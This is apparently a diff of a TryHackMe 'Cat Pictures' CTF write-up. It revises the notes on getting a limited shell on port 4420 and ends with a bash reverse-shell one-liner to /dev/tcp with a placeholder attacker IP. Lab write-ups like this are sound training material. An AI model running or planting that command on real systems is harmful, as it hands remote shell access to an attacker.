bl4ck574r/Writeups/THM/Cat Pictures.md

 ```

 ### PORT 4420
 Interacting with this port using nc, prompt us for password.
-We have password from previous note file, using it gives us a basic shell.
-This shell was limited to some function only.
+We have a password from previous note file using which,it gives us a basic shell.
+This shell had limited functionality.
-Poking around, didn't find anything interesting.
-There was only one file named *runme* in `/home/catlover`.
+Poking around, we found a file named *runme* in `/home/catlover`.
 To run this we need a better shell than this.
 ```bash
 # Victim
 echo "bash -i >& /dev/tcp/ourIP/port 0>&1" | bash